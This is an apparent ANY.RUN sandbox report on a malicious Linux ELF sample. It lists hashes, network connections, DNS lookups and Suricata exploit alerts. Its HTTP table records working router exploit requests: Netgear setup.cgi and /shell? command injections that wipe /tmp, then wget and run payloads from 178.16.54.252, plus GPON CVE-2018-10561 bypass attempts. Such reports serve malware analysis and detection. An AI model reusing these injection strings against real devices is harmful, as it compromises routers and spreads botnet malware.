File name:	Ujigbnye8fjnlQjJjCEdmYYOrHaG1IDXi6
Full analysis:	https://app.any.run/tasks/ad7e22e5-7624-451c-8bde-8975ce11dd88
Verdict:	Malicious activity
Analysis date:	August 25, 2025, 10:54:06
OS:	Ubuntu 22.04.2
Tags:	exploit
Indicators:
MIME:	application/x-executable
File info:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
MD5:	8B8C0216DFC57C4F7FB3A28F2C11092F
SHA1:	4E27EED09E093CAE6CAFDC6C3950FEC3DD855C56
SHA256:	DE5FB68023465CB5D8ACE412E11032D98A41BD6AF2A83245C046020530130496
SSDEEP:	1536:6Tw/RUKG1VyS5zChZ/Uh1+dgQO7h25YzPsm4fHM5R4JNtbm9c:6Tw/KKWVyS5kZ8h1+7tmUHM5RsNtbm9c

CPUArchitecture:	64 bit
CPUByteOrder:	Little endian
ObjectFileType:	Executable file
CPUType:	AMD x86-64

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	204	91.189.91.49:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
1914	Ujigbnye8fjnlQjJjCEdmYYOrHaG1IDXi6.elf	GET	200	178.16.54.252:80	http://178.16.54.252/.shell	unknown	—	—	—
1962	Ujigbnye8fjnlQjJjCEdmYYOrHaG1IDXi6.elf	GET	400	18.164.115.231:80	http://18.164.115.231:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://178.16.54.252/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	unknown	—	—	—
1964	Ujigbnye8fjnlQjJjCEdmYYOrHaG1IDXi6.elf	GET	403	18.164.115.231:80	http://18.164.115.231:80/shell?cd+/tmp;rm+-rf+*;wget+http://178.16.54.252/l7vmra;chmod+777+l7vmra;/tmp/l7vmra	unknown	—	—	—
1961	Ujigbnye8fjnlQjJjCEdmYYOrHaG1IDXi6.elf	POST	403	18.164.115.231:80	http://127.0.0.1:80/GponForm/diag_Form?images/	unknown	—	—	malicious
1967	Ujigbnye8fjnlQjJjCEdmYYOrHaG1IDXi6.elf	GET	—	194.146.132.77:80	http://194.146.132.77:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://178.16.54.252/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	unknown	—	—	—
1966	Ujigbnye8fjnlQjJjCEdmYYOrHaG1IDXi6.elf	POST	200	194.146.132.77:80	http://127.0.0.1:80/GponForm/diag_Form?images/	unknown	—	—	malicious
1991	Ujigbnye8fjnlQjJjCEdmYYOrHaG1IDXi6.elf	GET	404	116.58.254.21:80	http://116.58.254.21:80/shell?cd+/tmp;rm+-rf+*;wget+http://178.16.54.252/l7vmra;chmod+777+l7vmra;/tmp/l7vmra	unknown	—	—	—
1969	Ujigbnye8fjnlQjJjCEdmYYOrHaG1IDXi6.elf	GET	200	194.146.132.77:80	http://194.146.132.77:80/shell?cd+/tmp;rm+-rf+*;wget+http://178.16.54.252/l7vmra;chmod+777+l7vmra;/tmp/l7vmra	unknown	—	—	—
1989	Ujigbnye8fjnlQjJjCEdmYYOrHaG1IDXi6.elf	GET	—	116.58.254.21:80	http://116.58.254.21:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://178.16.54.252/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	unknown	—	—	—

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	195.181.175.40:443	odrs.gnome.org	Datacamp Limited	DE	whitelisted
477	avahi-daemon	224.0.0.251:5353	—	—	—	unknown
—	—	185.125.190.58:123	ntp.ubuntu.com	—	—	whitelisted
—	—	91.189.91.49:80	connectivity-check.ubuntu.com	Canonical Group Limited	US	whitelisted
—	—	185.125.188.57:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
—	—	185.125.188.59:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
—	—	185.125.188.54:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
496	snapd	185.125.188.54:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
496	snapd	185.125.188.58:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
496	snapd	185.125.188.59:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted

Domain	IP	Reputation
odrs.gnome.org	195.181.175.40 37.19.194.81 195.181.170.18 212.102.56.179 79.127.211.90 2a02:6ea0:c700::19 2a02:6ea0:c77a::47 2a02:6ea0:c700::101 2a02:6ea0:c700::21 2a02:6ea0:c700::11	whitelisted
google.com	172.217.18.110 2a00:1450:4001:82f::200e	whitelisted
ntp.ubuntu.com	185.125.190.58 185.125.190.57 91.189.91.157 185.125.190.56 2620:2d:4000:1::41 2620:2d:4000:1::40 2620:2d:4000:1::3f	whitelisted
api.snapcraft.io	185.125.188.57 185.125.188.54 185.125.188.58 185.125.188.59 2620:2d:4000:1010::2e6 2620:2d:4000:1010::2d6 2620:2d:4000:1010::117 2620:2d:4000:1010::42	whitelisted
connectivity-check.ubuntu.com	91.189.91.49 185.125.190.17 185.125.190.49 185.125.190.97 91.189.91.48 185.125.190.98 91.189.91.96 91.189.91.98 91.189.91.97 185.125.190.96 185.125.190.18 185.125.190.48 2620:2d:4000:1::97 2620:2d:4000:1::98 2620:2d:4000:1::2a 2620:2d:4000:1::23 2620:2d:4002:1::197 2620:2d:4000:1::22 2620:2d:4002:1::196 2620:2d:4002:1::198 2620:2d:4000:1::96 2620:2d:4000:1::2b 2001:67c:1562::23 2001:67c:1562::24	whitelisted
conn.elbbird.zip	178.16.54.252	unknown
3.100.168.192.in-addr.arpa	—	unknown

PID	Process	Class	Message
—	—	Misc activity	ET INFO Observed DNS Query to .zip TLD
—	—	Attempted Administrator Privilege Gain	ET HUNTING Suspicious Chmod Usage in URI (Outbound)
—	—	Attempted Administrator Privilege Gain	ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound
—	—	Attempted Administrator Privilege Gain	ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)
—	—	Attempted Administrator Privilege Gain	ET HUNTING Suspicious Chmod Usage in URI (Outbound)
—	—	Attempted Administrator Privilege Gain	ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound
—	—	Attempted Administrator Privilege Gain	ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)
—	—	Attempted Administrator Privilege Gain	ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound
—	—	Attempted Administrator Privilege Gain	ET HUNTING Suspicious Chmod Usage in URI (Outbound)
—	—	Attempted Administrator Privilege Gain	ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)

General Info

Ujigbnye8fjnlQjJjCEdmYYOrHaG1IDXi6

8B8C0216DFC57C4F7FB3A28F2C11092F

4E27EED09E093CAE6CAFDC6C3950FEC3DD855C56

DE5FB68023465CB5D8ACE412E11032D98A41BD6AF2A83245C046020530130496

1536:6Tw/RUKG1VyS5zChZ/Uh1+dgQO7h25YzPsm4fHM5R4JNtbm9c:6Tw/KKWVyS5kZ8h1+7tmUHM5RsNtbm9c

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

EXPLOIT has been detected (SURICATA)

SUSPICIOUS

Modifies file or directory owner

Executes commands using command-line interpreter

Connects to unusual port

INFO

Malware configuration

Static information

TRiD

EXIF

EXE

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Information

Information

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings